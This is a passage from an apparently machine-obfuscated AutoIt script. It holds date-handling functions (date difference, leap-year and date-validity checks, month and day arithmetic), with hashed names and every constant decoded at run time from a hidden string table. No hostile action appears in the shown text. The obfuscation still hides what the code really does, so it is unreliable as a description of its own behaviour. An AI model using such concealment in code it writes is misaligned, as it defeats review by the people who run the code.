  4432.     EndIf
  4433.     $a4896d15e31 = StringLeft($a4896d15e31, Number($a0137911a60))
  4434.     If StringInStr($a1037a12422, $a4896d15e31) = Number($a4037b13f33) OR $a4896d15e31 = "" Then
  4435.         Return SetError(Number($a6037c14c0f), Number($a6137d12716), Number($a0937e15b35))
  4436.     EndIf
  4437.     If NOT a3cf0800a58($a0637713410) Then
  4438.         Return SetError(Number($a0937f14011), Number($a0947011238), Number($a5c47113b33))
  4439.     EndIf
  4440.     If NOT a3cf0800a58($a2c3781103b) Then
  4441.         Return SetError(Number($a5547211229), Number($a4c47313a32), Number($a284741492a))
  4442.     EndIf
  4443.     Local $a4447511518[Number($a3d47615f09)], $a0447715326[Number($a2a47815927)], $a4247914455[Number($a3747a11a37)], $a3c47b13029[Number($a5747c12647)]
  4444.     a2201103e38($a0637713410, $a4447511518, $a0447715326)
  4445.     a2201103e38($a2c3781103b, $a4247914455, $a3c47b13029)
  4446.     Local $a4047d1033f = a620140274d($a4247914455[Number($a0f47e14330)], $a4247914455[Number($a1047f1315f)], $a4247914455[Number($a4157015d22)]) - a620140274d($a4447511518[Number($a3e57112600)], $a4447511518[Number($a575721524b)], $a4447511518[Number($a3c57310833)])
  4447.     Local $a0c57411e1d, $a3957512053, $a285761364f, $a5f57713947
  4448.     If $a0447715326[Number($a0d57812621)] > Number($a1257910b48) AND $a3c47b13029[Number($a3f57a14b5e)] > Number($a3957b10b5f) Then
  4449.         $a285761364f = $a0447715326[Number($a5757c1271e)] * Number($a1157d1123b) + $a0447715326[Number($a1c57e10521)] * Number($a4257f12859) + $a0447715326[Number($a2e67011f5c)]
  4450.         $a5f57713947 = $a3c47b13029[Number($a4e67113614)] * Number($a0f67213220) + $a3c47b13029[Number($a4967310b27)] * Number($a5667416310) + $a3c47b13029[Number($a1d67513e61)]
  4451.         $a0c57411e1d = $a5f57713947 - $a285761364f
  4452.         If $a0c57411e1d < Number($a3967610b0c) Then
  4453.             $a4047d1033f = $a4047d1033f - Number($a4c6771504c)
  4454.             $a0c57411e1d = $a0c57411e1d + Number($a576781383f) * Number($a0467915852) * Number($a2967a14528)
  4455.         EndIf
  4456.     Else
  4457.         $a0c57411e1d = Number($a1667b1315d)
  4458.     EndIf
  4459.     Select
  4460.         Case $a4896d15e31 = $a5f67c11a4b
  4461.             Return ($a4047d1033f)
  4462.         Case $a4896d15e31 = $a0967d1610e
  4463.             $a3957512053 = $a4247914455[Number($a5867e1511a)] - $a4447511518[Number($a2267f14f55)]
  4464.             Local $a1577014b20 = $a4247914455[Number($a1777110e1e)] - $a4447511518[Number($a1177210737)] + $a3957512053 * Number($a2a77315b19)
  4465.             If $a4247914455[Number($a1e77413203)] < $a4447511518[Number($a2a77515b29)] Then $a1577014b20 = $a1577014b20 - Number($a3377613f5d)
  4466.             $a285761364f = $a0447715326[Number($a4977714412)] * Number($a4a77811160) + $a0447715326[Number($a147791530e)] * Number($a2777a1013e) + $a0447715326[Number($a3b77b10d52)]
  4467.             $a5f57713947 = $a3c47b13029[Number($a1077c1304c)] * Number($a0f77d12739) + $a3c47b13029[Number($a0277e12f2e)] * Number($a3077f11629) + $a3c47b13029[Number($a5687015649)]
  4468.             $a0c57411e1d = $a5f57713947 - $a285761364f
  4469.             If $a4247914455[Number($a0b87114921)] = $a4447511518[Number($a0687215717)] AND $a0c57411e1d < Number($a3387311f50) Then $a1577014b20 = $a1577014b20 - Number($a1c8741161b)
  4470.             Return ($a1577014b20)
  4471.         Case $a4896d15e31 = $a0487510139
  4472.             $a3957512053 = $a4247914455[Number($a018761450b)] - $a4447511518[Number($a5787713a2d)]
  4473.             If $a4247914455[Number($a3187810e51)] < $a4447511518[Number($a2987914a63)] Then $a3957512053 = $a3957512053 - Number($a4387a13621)
  4474.             If $a4247914455[Number($a3687b14700)] = $a4447511518[Number($a1d87c10840)] AND $a4247914455[Number($a4187d14731)] < $a4447511518[Number($a4387e15055)] Then $a3957512053 = $a3957512053 - Number($a3787f1462e)
  4475.             $a285761364f = $a0447715326[Number($a0997011254)] * Number($a2f97113a23) + $a0447715326[Number($a469721201d)] * Number($a1597313d25) + $a0447715326[Number($a2197412c62)]
  4476.             $a5f57713947 = $a3c47b13029[Number($a4097515547)] * Number($a0797613d12) + $a3c47b13029[Number($a3a97716031)] * Number($a3c97811d08) + $a3c47b13029[Number($a049791055e)]
  4477.             $a0c57411e1d = $a5f57713947 - $a285761364f
  4478.             If $a4247914455[Number($a4697a1461a)] = $a4447511518[Number($a1397b15a06)] AND $a4247914455[Number($a4997c11b3d)] = $a4447511518[Number($a0997d11e0a)] AND $a0c57411e1d < Number($a5097e13113) Then $a3957512053 = $a3957512053 - Number($a5f97f10121)
  4479.             Return ($a3957512053)
  4480.         Case $a4896d15e31 = $a61a7011c5e
  4481.             Return (Int($a4047d1033f / Number($a3da7110c5a)))
  4482.         Case $a4896d15e31 = $a50a721601e
  4483.             Return ($a4047d1033f * Number($a44a731013e) + Int($a0c57411e1d / Number($a02a741292b)))
  4484.         Case $a4896d15e31 = $a26a751443d
  4485.             Return ($a4047d1033f * Number($a3ea761515f) * Number($a62a771322c) + Int($a0c57411e1d / Number($a13a7815a05)))
  4486.         Case $a4896d15e31 = $a2fa791502b
  4487.             Return ($a4047d1033f * Number($a5aa7a10349) * Number($a58a7b1015d) * Number($a12a7c11b00) + $a0c57411e1d)
  4488.     EndSelect
  4489. EndFunc
  4490.  
  4491. Func a3ff0601750($a4c37114838)
  4492.     If NOT IsDeclared("SSA3FF0601750") Then
  4493.         Global $a02a7d10737 = a2b00005424($os[3928]), $a01a7e1122c = a2b00005424($os[3929]), $a24a7f11a14 = a2b00005424($os[3930]), $a36b7013723 = a2b00005424($os[3931]), $a42b7113a2f = a2b00005424($os[3932]), $a2bb7212417 = a2b00005424($os[3933]), $a54b7315641 = a2b00005424($os[3934]), $a2ab741082d = a2b00005424($os[3935]), $a47b7514948 = a2b00005424($os[3936]), $a06b7611801 = a2b00005424($os[3937]), $a34b7711742 = a2b00005424($os[3938]), $a11b7812c30 = a2b00005424($os[3939])
  4494.         Global $ssa3ff0601750 = 1
  4495.     EndIf
  4496.     If StringIsInt($a4c37114838) Then
  4497.         Select
  4498.             Case Mod($a4c37114838, Number($a02a7d10737)) = Number($a01a7e1122c) AND Mod($a4c37114838, Number($a24a7f11a14)) <> Number($a36b7013723)
  4499.                 Return Number($a42b7113a2f)
  4500.             Case Mod($a4c37114838, Number($a2bb7212417)) = Number($a54b7315641)
  4501.                 Return Number($a2ab741082d)
  4502.             Case Else
  4503.                 Return Number($a47b7514948)
  4504.         EndSelect
  4505.     EndIf
  4506.     Return SetError(Number($a06b7611801), Number($a34b7711742), Number($a11b7812c30))
  4507. EndFunc
  4508.  
  4509. Func a2ef070520b($a0142210e3a)
  4510.     If NOT IsDeclared("SSA2EF070520B") Then
  4511.         Global $a0fb7912256 = a2b00005424($os[3940]), $a39b7a10423 = a2b00005424($os[3941]), $a40b7b12f1d = a2b00005424($os[3942]), $a61b7c11c58 = a2b00005424($os[3943]), $a25b7d1190f = a2b00005424($os[3944])
  4512.         Global $ssa2ef070520b = 1
  4513.     EndIf
  4514.     If StringIsInt($a0142210e3a) Then
  4515.         If $a0142210e3a >= Number($a0fb7912256) AND $a0142210e3a <= Number($a39b7a10423) Then
  4516.             Return Number($a40b7b12f1d)
  4517.         Else
  4518.             Return Number($a61b7c11c58)
  4519.         EndIf
  4520.     EndIf
  4521.     Return Number($a25b7d1190f)
  4522. EndFunc
  4523.  
  4524. Func a3cf0800a58($a5396f10f24)
  4525.     If NOT IsDeclared("SSA3CF0800A58") Then
  4526.         Global $a03b7e10813 = a2b00005424($os[3945]), $a25b7f15401 = a2b00005424($os[3946]), $a18c7110202 = a2b00005424($os[3947]), $a29c7210e3c = a2b00005424($os[3948]), $a39c7311b15 = a2b00005424($os[3949]), $a5fc7413d1f = a2b00005424($os[3950]), $a16c7513c32 = a2b00005424($os[3951]), $a36c761212f = a2b00005424($os[3952]), $a07c771535b = a2b00005424($os[3953]), $a41c781511b = a2b00005424($os[3954]), $a5dc7910a4e = a2b00005424($os[3955]), $a49c7a1130c = a2b00005424($os[3956]), $a10c7b11e1d = a2b00005424($os[3957]), $a54c7c10617 = a2b00005424($os[3958]), $a3bc7d15638 = a2b00005424($os[3959]), $a54c7e14b0d = a2b00005424($os[3960]), $a50c7f15535 = a2b00005424($os[3961]), $a4ed7011653 = a2b00005424($os[3962]), $a4dd711604f = a2b00005424($os[3963]), $a30d721171f = a2b00005424($os[3964]), $a37d7314540 = a2b00005424($os[3965]), $a57d7412e3d = a2b00005424($os[3966]), $a4cd7510d19 = a2b00005424($os[3967]), $a07d761054d = a2b00005424($os[3968]), $a19d7712263 = a2b00005424($os[3969]), $a2ed781244c = a2b00005424($os[3970]), $a62d7912c4c = a2b00005424($os[3971]), $a3bd7a1315d = a2b00005424($os[3972]), $a3ed7b14422 = a2b00005424($os[3973]), $a13d7c1605b = a2b00005424($os[3974]), $a1ed7d15508 = a2b00005424($os[3975]), $a57d7e1614d = a2b00005424($os[3976]), $a2ed7f11e14 = a2b00005424($os[3977]), $a2be7011a4f = a2b00005424($os[3978]), $a01e7115e0e = a2b00005424($os[3979]), $a4be7212553 = a2b00005424($os[3980]), $a37e7311226 = a2b00005424($os[3981]), $a1be7411701 = a2b00005424($os[3982]), $a29e751040b = a2b00005424($os[3983]), $a49e7613957 = a2b00005424($os[3984]), $a08e7711119 = a2b00005424($os[3985]), $a05e7810020 = a2b00005424($os[3986]), $a48e7911a1c = a2b00005424($os[3987]), $a4ae7a15356 = a2b00005424($os[3988]), $a19e7b1453f = a2b00005424($os[3989]), $a4ae7c10044 = a2b00005424($os[3990]), $a1be7d10d05 = a2b00005424($os[3991]), $a27e7e13133 = a2b00005424($os[3992]), $a30e7f12904 = a2b00005424($os[3993]), $a26f7010519 = a2b00005424($os[3994]), $a44f7115b62 = a2b00005424($os[3995]), $a54f7211d47 = a2b00005424($os[3996]), $a2ff7311546 = a2b00005424($os[3997])
  4527.         Global $a51f7415048 = a2b00005424($os[3998]), $a0ff7510c4e = a2b00005424($os[3999]), $a52f7610309 = a2b00005424($os[4000]), $a12f7713358 = a2b00005424($os[4001]), $a26f7812529 = a2b00005424($os[4002]), $a26f7914723 = a2b00005424($os[4003]), $a21f7a15800 = a2b00005424($os[4004]), $a50f7b12038 = a2b00005424($os[4005]), $a4bf7c13226 = a2b00005424($os[4006]), $a0bf7d1344c = a2b00005424($os[4007]), $a4df7e12248 = a2b00005424($os[4008]), $a41f7f15816 = a2b00005424($os[4009]), $a1f08014519 = a2b00005424($os[4010]), $a3e08114062 = a2b00005424($os[4011]), $a2008213d29 = a2b00005424($os[4012]), $a4908314a22 = a2b00005424($os[4013]), $a4808410c20 = a2b00005424($os[4014]), $a5408515010 = a2b00005424($os[4015]), $a130861493f = a2b00005424($os[4016]), $a1708713531 = a2b00005424($os[4017]), $a5e08815017 = a2b00005424($os[4018]), $a2e08915514 = a2b00005424($os[4019]), $a5208a15562 = a2b00005424($os[4020]), $a6008b12d0b = a2b00005424($os[4021]), $a3008c14003 = a2b00005424($os[4022]), $a1f08d10138 = a2b00005424($os[4023]), $a1008e13d07 = a2b00005424($os[4024]), $a0a08f14932 = a2b00005424($os[4025]), $a511801574e = a2b00005424($os[4026]), $a0418114534 = a2b00005424($os[4027]), $a3e18210328 = a2b00005424($os[4028]), $a281831340f = a2b00005424($os[4029])
  4528.         Global $ssa3cf0800a58 = 1
  4529.     EndIf
  4530.     Local $a5ea6213a32[Number($a03b7e10813)], $a33a6015e4e[Number($a25b7f15401)]
  4531.     Local $a27c701420f = StringSplit($a5396f10f24, $a18c7110202)
  4532.     If $a27c701420f[Number($a29c7210e3c)] > Number($a39c7311b15) Then $a5ea6213a32 = StringSplit($a27c701420f[Number($a5fc7413d1f)], $a16c7513c32)
  4533.     If UBound($a5ea6213a32) <> Number($a36c761212f) Then Return (Number($a07c771535b))
  4534.     If $a5ea6213a32[Number($a41c781511b)] <> Number($a5dc7910a4e) Then Return (Number($a49c7a1130c))
  4535.     If NOT StringIsInt($a5ea6213a32[Number($a10c7b11e1d)]) Then Return (Number($a54c7c10617))
  4536.     If NOT StringIsInt($a5ea6213a32[Number($a3bc7d15638)]) Then Return (Number($a54c7e14b0d))
  4537.     If NOT StringIsInt($a5ea6213a32[Number($a50c7f15535)]) Then Return (Number($a4ed7011653))
  4538.     $a5ea6213a32[Number($a4dd711604f)] = Number($a5ea6213a32[Number($a30d721171f)])
  4539.     $a5ea6213a32[Number($a37d7314540)] = Number($a5ea6213a32[Number($a57d7412e3d)])
  4540.     $a5ea6213a32[Number($a4cd7510d19)] = Number($a5ea6213a32[Number($a07d761054d)])
  4541.     Local $a3ff6412b1b = a631140382e($a5ea6213a32[Number($a19d7712263)])
  4542.     If $a5ea6213a32[Number($a2ed781244c)] < Number($a62d7912c4c) OR $a5ea6213a32[Number($a3bd7a1315d)] > Number($a3ed7b14422) Then Return (Number($a13d7c1605b))
  4543.     If $a5ea6213a32[Number($a1ed7d15508)] < Number($a57d7e1614d) OR $a5ea6213a32[Number($a2ed7f11e14)] > Number($a2be7011a4f) Then Return (Number($a01e7115e0e))
  4544.     If $a5ea6213a32[Number($a4be7212553)] < Number($a37e7311226) OR $a5ea6213a32[Number($a1be7411701)] > $a3ff6412b1b[$a5ea6213a32[Number($a29e751040b)]] Then Return (Number($a49e7613957))
  4545.     If $a27c701420f[Number($a08e7711119)] > Number($a05e7810020) Then
  4546.         $a33a6015e4e = StringSplit($a27c701420f[Number($a48e7911a1c)], $a4ae7a15356)
  4547.         If UBound($a33a6015e4e) < Number($a19e7b1453f) Then ReDim $a33a6015e4e[Number($a4ae7c10044)]
  4548.     Else
  4549.         Dim $a33a6015e4e[Number($a1be7d10d05)]
  4550.     EndIf
  4551.     If $a33a6015e4e[Number($a27e7e13133)] < Number($a30e7f12904) Then Return (Number($a26f7010519))
  4552.     If $a33a6015e4e[Number($a44f7115b62)] < Number($a54f7211d47) Then Return (Number($a2ff7311546))
  4553.     If $a33a6015e4e[Number($a51f7415048)] = Number($a0ff7510c4e) Then $a33a6015e4e[Number($a52f7610309)] = $a12f7713358
  4554.     If NOT StringIsInt($a33a6015e4e[Number($a26f7812529)]) Then Return (Number($a26f7914723))
  4555.     If NOT StringIsInt($a33a6015e4e[Number($a21f7a15800)]) Then Return (Number($a50f7b12038))
  4556.     If NOT StringIsInt($a33a6015e4e[Number($a4bf7c13226)]) Then Return (Number($a0bf7d1344c))
  4557.     $a33a6015e4e[Number($a4df7e12248)] = Number($a33a6015e4e[Number($a41f7f15816)])
  4558.     $a33a6015e4e[Number($a1f08014519)] = Number($a33a6015e4e[Number($a3e08114062)])
  4559.     $a33a6015e4e[Number($a2008213d29)] = Number($a33a6015e4e[Number($a4908314a22)])
  4560.     If $a33a6015e4e[Number($a4808410c20)] < Number($a5408515010) OR $a33a6015e4e[Number($a130861493f)] > Number($a1708713531) Then Return (Number($a5e08815017))
  4561.     If $a33a6015e4e[Number($a2e08915514)] < Number($a5208a15562) OR $a33a6015e4e[Number($a6008b12d0b)] > Number($a3008c14003) Then Return (Number($a1f08d10138))
  4562.     If $a33a6015e4e[Number($a1008e13d07)] < Number($a0a08f14932) OR $a33a6015e4e[Number($a511801574e)] > Number($a0418114534) Then Return (Number($a3e18210328))
  4563.     Return Number($a281831340f)
  4564. EndFunc
  4565.  
  4566. Func a36f0903f13($a0142210e3a)
  4567.     If NOT IsDeclared("SSA36F0903F13") Then
  4568.         Global $a4c18415b24 = a2b00005424($os[4030]), $a021851265b = a2b00005424($os[4031]), $a4a18615047 = a2b00005424($os[4032]), $a3c18712b0b = a2b00005424($os[4033])
  4569.         Global $ssa36f0903f13 = 1
  4570.     EndIf
  4571.     If StringIsInt($a0142210e3a) Then
  4572.         If StringLen($a0142210e3a) = Number($a4c18415b24) Then
  4573.             Return Number($a021851265b)
  4574.         Else
  4575.             Return Number($a4a18615047)
  4576.         EndIf
  4577.     EndIf
  4578.     Return Number($a3c18712b0b)
  4579. EndFunc
  4580.  
  4581. Func a09f0a02009($a1a1881401b)
  4582.     If NOT IsDeclared("SSA09F0A02009") Then
  4583.         Global $a3118915546 = a2b00005424($os[4034]), $a1f18a12f47 = a2b00005424($os[4035]), $a5b18b11206 = a2b00005424($os[4036]), $a2218c12f62 = a2b00005424($os[4037]), $a0e18d1533f = a2b00005424($os[4038]), $a3d18e1583f = a2b00005424($os[4039]), $a2c18f11904 = a2b00005424($os[4040]), $a1528011b3d = a2b00005424($os[4041]), $a5228215205 = a2b00005424($os[4042]), $a132831421c = a2b00005424($os[4043]), $a192841551e = a2b00005424($os[4044])
  4584.         Global $ssa09f0a02009 = 1
  4585.     EndIf
  4586.     Select
  4587.         Case NOT StringIsInt($a1a1881401b)
  4588.             Return SetError(Number($a3118915546), Number($a1f18a12f47), Number($a5b18b11206))
  4589.         Case $a1a1881401b < Number($a2218c12f62) OR $a1a1881401b > Number($a0e18d1533f)
  4590.             Return SetError(Number($a3d18e1583f), Number($a2c18f11904), Number($a1528011b3d))
  4591.         Case Else
  4592.             Local $a0928112c60
  4593.             If $a1a1881401b = Number($a5228215205) Then
  4594.                 $a0928112c60 = Number($a132831421c)
  4595.             Else
  4596.                 $a0928112c60 = $a1a1881401b - Number($a192841551e)
  4597.             EndIf
  4598.             Return $a0928112c60
  4599.     EndSelect
  4600. EndFunc
  4601.  
  4602. Func a48f0b02a5a($a3f3721131a)
  4603.     If NOT IsDeclared("SSA48F0B02A5A") Then
  4604.         Global $a0028511e57 = a2b00005424($os[4045]), $a1b28613504 = a2b00005424($os[4046]), $a5f28713124 = a2b00005424($os[4047]), $a6128814615 = a2b00005424($os[4048]), $a232891061f = a2b00005424($os[4049]), $a0a28a12228 = a2b00005424($os[4050]), $a0828b11a4c = a2b00005424($os[4051]), $a4228c11462 = a2b00005424($os[4052]), $a0d28e1562e = a2b00005424($os[4053]), $a3f28f11e05 = a2b00005424($os[4054]), $a4b38013c53 = a2b00005424($os[4055]), $a633811495a = a2b00005424($os[4056])
  4605.         Global $ssa48f0b02a5a = 1
  4606.     EndIf
  4607.     Select
  4608.         Case NOT StringIsInt($a3f3721131a)
  4609.             Return SetError(Number($a0028511e57), Number($a1b28613504), Number($a5f28713124))
  4610.         Case $a3f3721131a < Number($a6128814615) OR $a3f3721131a > Number($a232891061f)
  4611.             Return SetError(Number($a0a28a12228), Number($a0828b11a4c), Number($a4228c11462))
  4612.         Case Else
  4613.             Local $a2528d13445
  4614.             If $a3f3721131a = Number($a0d28e1562e) Then
  4615.                 $a2528d13445 = Number($a3f28f11e05)
  4616.             Else
  4617.                 $a2528d13445 = $a3f3721131a - Number($a4b38013c53)
  4618.             EndIf
  4619.             $a2528d13445 = StringFormat($a633811495a, $a2528d13445)
  4620.             Return $a2528d13445
  4621.     EndSelect
  4622. EndFunc
  4623.  
  4624. Func a3ff0c03358($a3f3721131a, $a4c37114838)
  4625.     If NOT IsDeclared("SSA3FF0C03358") Then
  4626.         Global $a0b38211346 = a2b00005424($os[4057]), $a5638312b1b = a2b00005424($os[4058]), $a2d38410602 = a2b00005424($os[4059]), $a603851310a = a2b00005424($os[4060]), $a0e3861234a = a2b00005424($os[4061]), $a1c38712f0e = a2b00005424($os[4062]), $a3838815814 = a2b00005424($os[4063]), $a0238916357 = a2b00005424($os[4064]), $a0f38b14049 = a2b00005424($os[4065]), $a4038c11331 = a2b00005424($os[4066]), $a0c38d1344f = a2b00005424($os[4067])
  4627.         Global $ssa3ff0c03358 = 1
  4628.     EndIf
  4629.     Select
  4630.         Case NOT StringIsInt($a3f3721131a) OR NOT StringIsInt($a4c37114838)
  4631.             Return SetError(Number($a0b38211346), Number($a5638312b1b), Number($a2d38410602))
  4632.         Case $a3f3721131a < Number($a603851310a) OR $a3f3721131a > Number($a0e3861234a)
  4633.             Return SetError(Number($a1c38712f0e), Number($a3838815814), Number($a0238916357))
  4634.         Case Else
  4635.             Local $a6338a13658
  4636.             If $a3f3721131a = Number($a0f38b14049) Then
  4637.                 $a6338a13658 = $a4c37114838 - Number($a4038c11331)
  4638.             Else
  4639.                 $a6338a13658 = $a4c37114838
  4640.             EndIf
  4641.             $a6338a13658 = StringFormat($a0c38d1344f, $a6338a13658)
  4642.             Return $a6338a13658
  4643.     EndSelect
  4644. EndFunc
  4645.  
  4646. Func a18f0d05956($a1a1881401b)
  4647.     If NOT IsDeclared("SSA18F0D05956") Then
  4648.         Global $a4738e15612 = a2b00005424($os[4068]), $a4238f1382e = a2b00005424($os[4069]), $a1148013c46 = a2b00005424($os[4070]), $a6248115608 = a2b00005424($os[4071]), $a5348210129 = a2b00005424($os[4072]), $a2748311e3c = a2b00005424($os[4073]), $a5e48412b54 = a2b00005424($os[4074]), $a5848513149 = a2b00005424($os[4075]), $a0848712126 = a2b00005424($os[4076]), $a244881254e = a2b00005424($os[4077]), $a4548911a0e = a2b00005424($os[4078])
  4649.         Global $ssa18f0d05956 = 1
  4650.     EndIf
  4651.     Select
  4652.         Case NOT StringIsInt($a1a1881401b)
  4653.             Return SetError(Number($a4738e15612), Number($a4238f1382e), Number($a1148013c46))
  4654.         Case $a1a1881401b < Number($a6248115608) OR $a1a1881401b > Number($a5348210129)
  4655.             Return SetError(Number($a2748311e3c), Number($a5e48412b54), Number($a5848513149))
  4656.         Case Else
  4657.             Local $a3048611a53
  4658.             If $a1a1881401b = Number($a0848712126) Then
  4659.                 $a3048611a53 = Number($a244881254e)
  4660.             Else
  4661.                 $a3048611a53 = $a1a1881401b + Number($a4548911a0e)
  4662.             EndIf
  4663.             Return $a3048611a53
  4664.     EndSelect
  4665. EndFunc
  4666.  
  4667. Func a52f0e02f5c($a3f3721131a)
  4668.     If NOT IsDeclared("SSA52F0E02F5C") Then
  4669.         Global $a0b48a1612e = a2b00005424($os[4079]), $a2948b14855 = a2b00005424($os[4080]), $a5448c14955 = a2b00005424($os[4081]), $a2348d13712 = a2b00005424($os[4082]), $a2f48e11d44 = a2b00005424($os[4083]), $a4048f15557 = a2b00005424($os[4084]), $a1c58010233 = a2b00005424($os[4085]), $a5d5811155d = a2b00005424($os[4086]), $a045831092e = a2b00005424($os[4087]), $a2158414145 = a2b00005424($os[4088]), $a4858510a3e = a2b00005424($os[4089]), $a5858614011 = a2b00005424($os[4090])
  4670.         Global $ssa52f0e02f5c = 1
  4671.     EndIf
  4672.     Select
  4673.         Case NOT StringIsInt($a3f3721131a)
  4674.             Return SetError(Number($a0b48a1612e), Number($a2948b14855), Number($a5448c14955))
  4675.         Case $a3f3721131a < Number($a2348d13712) OR $a3f3721131a > Number($a2f48e11d44)
  4676.             Return SetError(Number($a4048f15557), Number($a1c58010233), Number($a5d5811155d))
  4677.         Case Else
  4678.             Local $a0058212c44
  4679.             If $a3f3721131a = Number($a045831092e) Then
  4680.                 $a0058212c44 = Number($a2158414145)
  4681.             Else
  4682.                 $a0058212c44 = $a3f3721131a + Number($a4858510a3e)
  4683.             EndIf
  4684.             $a0058212c44 = StringFormat($a5858614011, $a0058212c44)
  4685.             Return $a0058212c44
  4686.     EndSelect
  4687. EndFunc
  4688.  
  4689. Func a59f0f02a26($a3f3721131a, $a4c37114838)
  4690.     If NOT IsDeclared("SSA59F0F02A26") Then
  4691.         Global $a2e58714540 = a2b00005424($os[4091]), $a2b5881345b = a2b00005424($os[4092]), $a2e58914a4c = a2b00005424($os[4093]), $a3858a13c50 = a2b00005424($os[4094]), $a5758b12426 = a2b00005424($os[4095]), $a0058c1134a = a2b00005424($os[4096]), $a2b58d1335e = a2b00005424($os[4097]), $a4e58e1041c = a2b00005424($os[4098]), $a4968015b19 = a2b00005424($os[4099]), $a1968112459 = a2b00005424($os[4100]), $a1168211b5e = a2b00005424($os[4101])
  4692.         Global $ssa59f0f02a26 = 1
  4693.     EndIf
  4694.     Select
  4695.         Case NOT StringIsInt($a3f3721131a) OR NOT StringIsInt($a4c37114838)
  4696.             Return SetError(Number($a2e58714540), Number($a2b5881345b), Number($a2e58914a4c))
  4697.         Case $a3f3721131a < Number($a3858a13c50) OR $a3f3721131a > Number($a5758b12426)
  4698.             Return SetError(Number($a0058c1134a), Number($a2b58d1335e), Number($a4e58e1041c))
  4699.         Case Else
  4700.             Local $a2858f13914
  4701.             If $a3f3721131a = Number($a4968015b19) Then
  4702.                 $a2858f13914 = $a4c37114838 + Number($a1968112459)
  4703.             Else
  4704.                 $a2858f13914 = $a4c37114838
  4705.             EndIf
  4706.             $a2858f13914 = StringFormat($a1168211b5e, $a2858f13914)
  4707.             Return $a2858f13914
  4708.     EndSelect
  4709. EndFunc
  4710.  
  4711. Func a3501001038($a5396f10f24, $a4896d15e31)
  4712.     If NOT IsDeclared("SSA3501001038") Then
  4713.         Global $a5e68310218 = a2b00005424($os[4102]), $a0468415316 = a2b00005424($os[4103]), $a3a68a11e47 = a2b00005424($os[4104]), $a3868b11836 = a2b00005424($os[4105]), $a3a68c1601f = a2b00005424($os[4106]), $a5268d15e3e = a2b00005424($os[4107]), $a2e68e1431c = a2b00005424($os[4108]), $a1168f1555f = a2b00005424($os[4109]), $a2878010630 = a2b00005424($os[4110]), $a4d78115209 = a2b00005424($os[4111]), $a3678211b34 = a2b00005424($os[4112]), $a4b7831252d = a2b00005424($os[4113]), $a637841114b = a2b00005424($os[4114]), $a5878514941 = a2b00005424($os[4115]), $a387861260f = a2b00005424($os[4116]), $a6278713c46 = a2b00005424($os[4117]), $a4078812807 = a2b00005424($os[4118]), $a0078915a2c = a2b00005424($os[4119]), $a3f78a14c5a = a2b00005424($os[4120]), $a1078b15f40 = a2b00005424($os[4121]), $a0d78c13f2c = a2b00005424($os[4122]), $a3778d11232 = a2b00005424($os[4123]), $a6378e12435 = a2b00005424($os[4124]), $a1d78f10a54 = a2b00005424($os[4125]), $a5d88011b07 = a2b00005424($os[4126]), $a478811465f = a2b00005424($os[4127]), $a3288210117 = a2b00005424($os[4128]), $a1988310f62 = a2b00005424($os[4129]), $a5c8841390f = a2b00005424($os[4130]), $a0e88515b12 = a2b00005424($os[4131]), $a5b8861003b = a2b00005424($os[4132]), $a6388716135 = a2b00005424($os[4133]), $a338881405a = a2b00005424($os[4134]), $a3f8891455d = a2b00005424($os[4135]), $a5688a10150 = a2b00005424($os[4136]), $a4c88b11312 = a2b00005424($os[4137]), $a5188c1073f = a2b00005424($os[4138]), $a5d88d11121 = a2b00005424($os[4139]), $a2388e15254 = a2b00005424($os[4140]), $a2388f15d02 = a2b00005424($os[4141]), $a189801103d = a2b00005424($os[4142]), $a5798112a3a = a2b00005424($os[4143]), $a069821321d = a2b00005424($os[4144]), $a549831241c = a2b00005424($os[4145]), $a3698413b12 = a2b00005424($os[4146]), $a6298514d5d = a2b00005424($os[4147]), $a2698614552 = a2b00005424($os[4148]), $a1c98710319 = a2b00005424($os[4149]), $a5498811a33 = a2b00005424($os[4150]), $a5f98910e15 = a2b00005424($os[4151]), $a3298a1495b = a2b00005424($os[4152]), $a2498b1314f = a2b00005424($os[4153])
  4714.         Global $a5298c10b2a = a2b00005424($os[4154]), $a0798d14b35 = a2b00005424($os[4155]), $a1d98e13907 = a2b00005424($os[4156]), $a0198f1583d = a2b00005424($os[4157]), $a26a8012140 = a2b00005424($os[4158]), $a32a811181f = a2b00005424($os[4159]), $a44a8212d59 = a2b00005424($os[4160]), $a32a831264a = a2b00005424($os[4161]), $a5ea8411f11 = a2b00005424($os[4162]), $a4ba8513457 = a2b00005424($os[4163]), $a04a861204d = a2b00005424($os[4164]), $a1ba8715925 = a2b00005424($os[4165]), $a4ea8815354 = a2b00005424($os[4166]), $a2fa8914954 = a2b00005424($os[4167]), $a26a8a13523 = a2b00005424($os[4168]), $a43a8b14752 = a2b00005424($os[4169]), $a34a8c1333b = a2b00005424($os[4170]), $a2ba8d11241 = a2b00005424($os[4171]), $a4aa8e1093f = a2b00005424($os[4172]), $a02a8f14616 = a2b00005424($os[4173]), $a35b8010828 = a2b00005424($os[4174]), $a4eb811424d = a2b00005424($os[4175]), $a00b8210414 = a2b00005424($os[4176]), $a5db8313029 = a2b00005424($os[4177]), $a25b8414332 = a2b00005424($os[4178]), $a12b8512d00 = a2b00005424($os[4179]), $a46b861253c = a2b00005424($os[4180]), $a13b871193f = a2b00005424($os[4181]), $a2db8814956 = a2b00005424($os[4182]), $a1cb891174a = a2b00005424($os[4183]), $a22b8a1152c = a2b00005424($os[4184]), $a39b8b1072c = a2b00005424($os[4185]), $a18b8c1364e = a2b00005424($os[4186]), $a23b8d12d23 = a2b00005424($os[4187]), $a1bb8e13f36 = a2b00005424($os[4188]), $a3bb8f14038 = a2b00005424($os[4189]), $a2dc801254c = a2b00005424($os[4190]), $a1ac8111139 = a2b00005424($os[4191]), $a55c821002b = a2b00005424($os[4192]), $a14c831303d = a2b00005424($os[4193]), $a3ec8412345 = a2b00005424($os[4194]), $a31c8510306 = a2b00005424($os[4195]), $a2ec8613010 = a2b00005424($os[4196]), $a62c8714421 = a2b00005424($os[4197]), $a1ac8810754 = a2b00005424($os[4198]), $a2ac8914622 = a2b00005424($os[4199]), $a53c8a13e1a = a2b00005424($os[4200]), $a34c8b13c62 = a2b00005424($os[4201]), $a56c8c1352f = a2b00005424($os[4202]), $a39c8d13a1d = a2b00005424($os[4203]), $a34c8e14739 = a2b00005424($os[4204]), $a46c8f14a63 = a2b00005424($os[4205])
